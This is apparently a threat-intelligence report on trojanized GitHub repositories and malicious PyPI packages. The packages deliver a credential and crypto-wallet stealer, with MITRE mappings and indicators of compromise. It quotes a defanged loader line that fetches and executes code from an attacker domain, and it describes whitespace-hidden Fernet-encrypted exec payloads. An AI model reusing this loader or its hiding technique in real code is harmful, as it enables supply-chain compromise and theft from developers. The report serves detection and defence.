Keypoints
- Threat actors clone and trojanize popular GitHub repositories (e.g., discord-boost-tool) and publish malicious PyPi packages to reach developers and users.
- The primary initial technique, “exec smuggling,” hides an encrypted payload off-screen with whitespace, decrypts it with Fernet, and executes a requests.get() result via Python exec().
- Second-stage dropper installs Python dependencies, looks for installed Python versions and Cryptodome directories, writes a decryptor to APPDATA (pl.py), and executes it hidden.
- Final payload includes a modified BlackCap-Grabber stealer (browser passwords, cookies, app credentials, clipboard hijack) and Exodus-specific injection to harvest wallet passwords and mnemonics.
- Exodus compromise is achieved by replacing the app.asar archive in ElectronJS installs or, if not present, dropping a startup script (stromrechnung.py) to install a miner (miner.exe) and persist.
- Network behavior uses HTTP GET/POST to attacker domains (e.g., bananasquad[.]ru) for C2, payload retrieval, and exfiltration to /handler and /downlodhandler endpoints.
- Obfuscation and delivery methods include base64, compression (zlib/gzip/lzma), marshal, hex/bytes.fromhex, and encrypted Fernet blobs; execution often uses subprocess.Popen and exec(compile(…)).
MITRE Techniques
- [T1195] Supply Chain Compromise – Actors trojanized public code repositories and PyPi packages to distribute malicious droppers and stealers: ‘[cloned legitimate GitHub repositories … and then trojanized and infected them with malicious code]’
- [T1059.006] Command and Scripting Interpreter: Python – Malicious stages are executed dynamically via Python exec(), e.g., ‘[exec(requests.get(‘hxxps[://]bananasquad[.]ru/paste’).text.replace(”,”).replace(”,”))]’
- [T1105] Ingress Tool Transfer – Secondary stages and malicious app.asar files are downloaded from attacker-controlled infrastructure using web requests: ‘[exec(requests.get(…).text …)]’
- [T1027] Obfuscated Files or Information – Payloads are hidden using long whitespace, Fernet encryption, base64, compression, and marshal to conceal C2 details and code: ‘u003cWHITESPACEu003e;exec(Fernet(b’n4URWLeT…’).decrypt(b’…’))’
- [T1041] Exfiltration Over C2 Channel – Stolen credentials, cookies, and wallet data are sent to attacker endpoints via HTTP POST to handler paths: ‘[the attacker sends a POST request containing the exfiltrated passwords, cookies, and cryptocurrency addresses to the attacker’s infrastructure.]’
- [T1071.001] Application Layer Protocol: Web Protocols – C2 and data transfer use HTTP(S) via requests.get()/POST calls: ‘[exec(requests.get(…))]’
- [T1056.003] Input Capture: Clipboard Data – Malware hijacks the Windows clipboard to replace cryptocurrency addresses with the attacker’s address: ‘[Hijacking the Windows clipboard to alter cryptocurrency addresses, replacing its content with the attacker’s wallet address]’
- [T1547.001] Boot or Logon Autostart Execution: Startup Folder – If Exodus isn’t present, the dropper places stromrechnung.py in the Windows startup folder to persist: ‘[download the file stromrechnung.py to MicrosoftWindowsStart MenuProgramsStartup]’
- [T1548.002] Abuse Elevation Control Mechanism: Bypass UAC – The startup script writes batch logic using Living-off-the-Land drivers (LoLDrivers) to bypass UAC and run a miner: ‘[Write the logic using Living of the Land Drivers (LoLDrivers) to bypass UAC]’
Indicators of Compromise
- [Domain] C2/payload host – bananasquad[.]ru (used in requests.get(‘hxxps://bananasquad[.]ru/paste’))
- [HTTP endpoints] Exfiltration and handlers – /handler, /downlodhandler (POST requests carrying usernames, passwords, cookies)
- [File names] Droppers and persistence – pl.py (decryptor in %APPDATA%), stromrechnung.py (startup persistence), miner.exe (downloaded miner)
- [Repository / user] Compromised GitHub artifacts – discord-boost-tool (Wieselnuggis), forks originating from suspected PatrickPagoda repositories
- [Packages] Malicious PyPi examples – pipcoloringskitsV1, pipcryptomodulesV1, and dozens of similarly named packages used to deliver stage-2 droppers (and many more)
- [Paths] Targeted ElectronJS app archive locations – %LOCALAPPDATA%exodusapp-xx.x.xxresourcesapp.asar, /usr/lib/exodus/resources/app.asar
The infection chain begins with cloned GitHub repositories or malicious PyPi packages where the attacker injects an “exec smuggling” construct: a long whitespace sequence hides an encrypted payload, which is decrypted with Fernet and executed using Python exec(), often retrieving the next stage via requests.get() from an attacker web host. The stage-2 dropper then installs Python dependencies (requests, httpx, pyperclip, pyotp, pycryptodomex, etc.), enumerates installed Python versions, duplicates Cryptodome to Crypto when present, writes a decryptor file (pl.py) into %APPDATA% and executes it without a visible window, and uses subprocess.Popen for process creation and further payload execution.
The final payload set includes a modified BlackCap-Grabber stealer with browser credential/cookie collection, system info gathering, token-stealing bypasses, clipboard hijacking to replace cryptocurrency addresses, and Exodus-specific injection logic. For Exodus, the malware checks common app.asar locations, downloads a malicious app.asar from attacker infrastructure, kills the legitimate Exodus process, and overwrites the app.asar to exfiltrate wallet passwords, mnemonic phrases, and wallet directories via HTTP POSTs to attacker handlers; if Exodus is absent, the code drops stromrechnung.py into the Startup folder, which creates a batch that leverages LoLDrivers to bypass UAC and fetchs/runs miner.exe for coin mining.
Delivery and obfuscation techniques observed include numerous forms of encoded and compressed payloads (base64, bytes.fromhex/hex, marshal, zlib/gzip/lzma), encrypted blobs decrypted via Fernet, and dynamic execution patterns such as exec(compile(…)) and exec(marshal.loads(…)). Network behavior centers on HTTP-based C2 (requests.get/POST) to specific domains and endpoints, and persistence and exfiltration are achieved through startup autorun entries, overwritten Electron archives, and HTTP POST handlers that collect harvested credentials and wallet data.